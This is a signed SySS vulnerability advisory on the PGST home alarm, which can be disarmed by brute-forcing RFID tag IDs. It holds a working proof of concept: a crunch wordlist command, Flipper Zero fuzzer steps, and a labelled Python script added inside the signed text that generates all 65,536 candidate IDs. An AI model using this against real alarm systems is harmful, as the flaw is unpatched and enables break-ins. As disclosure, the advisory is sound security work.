-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-070
Product: PGST Security Alarm System
Manufacturer: Shenzhen Pilot Guards Safety Technology Co., Ltd (PGST)
Affected Version(s): 2024-08-19 (No version number)
Tested Version(s): 2024-08-19 (No version number)
Vulnerability Type: Improper Restriction of Excessive Authentication Attempts (CWE-307)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2024-10-16
Solution Date: TBA
Public Disclosure: 2024-12-04
CVE Reference: Not yet assigned
Author of Advisory: Sebastian Auwärter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The PGST Security Alarm System is a home alarm system.

The manufacturer describes the product as follows (see [1]):

"Our WiFi/GSM alarm system offers reliable and comprehensive protection
for your home, garage, apartments and shops or other buildings on your
property."

Because the system is armed and disarmed with RFID transponders that
have no security features [5], the PGST Security Alarm System is
vulnerable to a brute-force attack. An attacker without access to a
legitimate RFID transponder is able to disarm the alarm system,
rendering it useless.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An RFID transponder based on the EM4100 chip is used to disarm the alarm
system. Once disarmed, the alarm is not set off when the various sensors
detect an opened door or window, movement, and so on.

The tag carries a fixed ID of 32 bits of data plus an 8-bit version
number, 40 bits in total. An EM4100 tag merely broadcasts this ID; there
is no challenge-response, key or other authentication involved, so an
emulator transmitting the correct 40 bits is indistinguishable from the
original tag.

In principle the whole 40-bit space can be brute-forced, but this takes
a very long time. However, all analyzed tags started with the same three
bytes, 53:00:C9, which means only two bytes (65,536 possible values) are
randomly assigned. These two bytes can be brute-forced in a reasonable
amount of time. It is possible that other RFID tags sold with the
product use IDs of a different range, in which case brute-forcing would
take much longer.
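The following Python script is an added example written for this page; it
is not part of the original advisory and is not SySS or PGST code. It
shows why the attack works at the protocol level: it encodes a 40-bit
EM4100 ID into the 64-bit frame the tag repeats (9 header bits, 10 data
rows with even row parity, 4 column parity bits and a stop bit, as
documented in [5]), decodes such a frame with the checks a reader
applies, enumerates the 65,536 candidate IDs behind the observed
53:00:C9 prefix, and bounds the worst-case attack time for given
emulation and delay settings. The one-UID-per-line hex file format for
the Flipper Zero RFID fuzzer and the timing values used are assumptions,
not values taken from the advisory.

```python
# Added example (not part of the SySS advisory): EM4100 ID space
# enumeration and frame encoding for the case described above.
# Assumptions are marked as such; check the fuzzer's file format against
# the RFID fuzzer README before loading a generated list.
from typing import List, Optional

# Fixed prefix observed on all analysed tags (from the advisory).
OBSERVED_PREFIX = bytes.fromhex("5300C9")
ID_LEN = 5  # EM4100: 8-bit version/customer ID + 32-bit data = 40 bits


def em4100_frame(uid: bytes) -> List[int]:
    """Return the 64-bit frame an EM4100 tag repeats for a 40-bit ID.

    Layout (reference [5]): 9 header bits set to 1, then 10 rows of one
    data nibble followed by an even row-parity bit, then 4 even
    column-parity bits, then a stop bit of 0. No key, nonce or challenge
    appears anywhere: the frame is a pure function of the ID, so a
    guessed or recorded ID can be emulated verbatim.
    """
    if len(uid) != ID_LEN:
        raise ValueError("EM4100 IDs are exactly 5 bytes")
    bits = [1] * 9
    column_parity = [0, 0, 0, 0]
    for byte in uid:
        for nibble in (byte >> 4, byte & 0x0F):
            row = [(nibble >> shift) & 1 for shift in (3, 2, 1, 0)]
            bits.extend(row)
            bits.append(sum(row) % 2)  # even parity over the row
            column_parity = [c ^ r for c, r in zip(column_parity, row)]
    bits.extend(column_parity)  # even parity over each column
    bits.append(0)  # stop bit
    return bits


def em4100_decode(bits: List[int]) -> Optional[bytes]:
    """Inverse of em4100_frame: the ID, or None if any check fails.

    These are the only checks a reader performs on the air interface; a
    brute-forcing emulator just has to pass them for each candidate ID.
    """
    if len(bits) != 64 or bits[:9] != [1] * 9 or bits[63] != 0:
        return None
    nibbles = []
    column_parity = [0, 0, 0, 0]
    for i in range(10):
        start = 9 + 5 * i
        row = bits[start:start + 4]
        if sum(row) % 2 != bits[start + 4]:
            return None
        column_parity = [c ^ r for c, r in zip(column_parity, row)]
        nibbles.append(row[0] << 3 | row[1] << 2 | row[2] << 1 | row[3])
    if column_parity != bits[59:63]:
        return None
    return bytes(nibbles[i] << 4 | nibbles[i + 1] for i in range(0, 10, 2))


def candidate_ids(prefix: bytes = OBSERVED_PREFIX) -> List[bytes]:
    """Every ID sharing `prefix`; three fixed bytes leave 2^16 candidates."""
    free_bytes = ID_LEN - len(prefix)
    return [prefix + n.to_bytes(free_bytes, "big")
            for n in range(256 ** free_bytes)]


def fuzzer_lines(prefix: bytes = OBSERVED_PREFIX) -> List[str]:
    """Candidate IDs as upper-case hex, one per line.

    Assumption: the Flipper Zero RFID fuzzer accepts one 10-hex-digit UID
    per line. Verify against the app's documentation before use.
    """
    return [uid.hex().upper() for uid in candidate_ids(prefix)]


def worst_case_hours(candidates: int, emulation_s: float,
                     delay_s: float) -> float:
    """Upper bound on attack time for the fuzzer's per-UID timing settings."""
    return candidates * (emulation_s + delay_s) / 3600.0


if __name__ == "__main__":
    ids = candidate_ids()
    with open("wordlist.txt", "w") as fh:
        fh.write("\n".join(fuzzer_lines()) + "\n")
    # Illustrative timing values (assumed, not measured on the device).
    print(f"{len(ids)} candidates, worst case "
          f"{worst_case_hours(len(ids), 1.0, 0.2):.1f} h")
    print(f"full 40-bit space: "
          f"{worst_case_hours(2 ** 40, 1.0, 0.2) / 24 / 365:.0f} years")
```

The comparison printed at the end is the whole point of the advisory's
observation about the fixed prefix: with three bytes known, the search
is a matter of hours at one emulation per second, whereas the full
40-bit space would take tens of thousands of years at the same rate.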
As no countermeasures exist (no lockout or rate limiting after repeated
unknown tags), the alarm system can be disarmed without any
prerequisites using an RFID emulator.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Hardware which is able to emulate RFID tags is necessary to reproduce
this brute-force attack. For example, a Flipper Zero [6] with the RFID
fuzzer [7] app can be utilized.

Creating a word list:

A word list generator like crunch [8] can be used to create a word list
of all 65,536 IDs starting with 53:00:C9. Note that crunch enumerates in
the order of the supplied character set, so the set and the -s/-e bounds
must cover the whole range from 0000 to FFFF for the last two bytes:

"""
crunch 10 10 0123456789ABCDEF -s 5300C90000 -e 5300C9FFFF \
    -o wordlist.txt
"""

The file needs to be copied to the attacker device. After selecting
"Apps -> RFID -> RFID Fuzzer", select "Load UIDs from File". Time delay
and emulation time can be adjusted, then the attack can be started by
pressing the start button. After the correct data has been emulated, the
alarm system will be disarmed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

TBA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-08-19: Vulnerability discovered
2024-10-16: Vulnerability reported to manufacturer
2024-11-08: Reminder sent to the manufacturer
2024-12-04: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Amazon link for the PGST Security Alarm System
    https://www.amazon.de/PGST-Komplettsystem-120-dB-Alarmsirene-Intelligenter-Fernbedienung/dp/B0CLHVRPFX/ref=sr_1_6?th=1
[2] Product website for the PGST Security Alarm System
    https://www.cn-pgst.com/
[3] SySS Security Advisory SYSS-2024-070
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-070.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] EM4100 chip description
    https://www.priority1design.com.au/em4100_protocol.html
[6] Flipper Zero homepage
    https://flipperzero.one/
[7] RFID fuzzer
    https://github.com/DarkFlippers/Multi_Fuzzer
[8] Crunch
    https://github.com/jim3ma/crunch

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwärter of SySS GmbH.

E-Mail: sebastian.auwaerter@syss.de
LinkedIn: https://de.linkedin.com/in/sebastian-auw%C3%A4rter-156035305
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE+Yw+EmcTGdmeL74+6aMNSOLwqLYFAmdQRtgACgkQ6aMNSOLw
qLZvhg//e6RF8OaXPjeShW8f5Pfd0jQQcCc0SYYa1XpN4xIzYzfao+OF2ntbRX2W
/Byv4f1tRIizZ3G9yRtexfGlIqvhv9iTbLUlZcCOpEytoLyBHkwYExh1/MLgJne4
htgpAZ+TCPIttFwSrb0mZ1W3aytxROKTMUR/XURQMZNLyvyQX1q9DmOK/RCHFcjP
SHkecygRFfz59I2T2w5qIpQodRSfdV9zFPvX/44LcY3uSvuFGq6BPG7ls9Xp+rC4
C3Ax85Y1EYeFuVXYF9R4JRLhBd0YtiarQ4b+noj8rr2VUUVBWsjx5KYR7Aybpu4+
b/PIEMudboNv6p+agGRR5wTcadXGXWfPKpUU3a24+Adh8Fi/70dvRbM39VYh8Mom
G4tw6aplmVYGMsP3glqLMz6OQHcXyE3KJEGB9ekrXgrLqEAa6T6k8SRiHer4BXVs
eVxYJRDR9Q4ULE7YJK2xQi9xr2qN3hRHH0dIG263+SagntO8kmopqzVPrCake+Ur
VbBMLZifILeZb3McaQqG98DSTj2iB1XweOxR7rIywjjr5bPnM8Puo5H/TUNSta9g
qYgSt0MUxSLjYcGYRQ7WYn07E900Mc5u24f47O7Yc4ww1/SBo7ynOyq/MseDH7x2
RSWRhXc3bt8DCh84dyYOUfMdQPo7eJtBP1xNPebRUH9E9VUtQk0=
=2kEr
-----END PGP SIGNATURE-----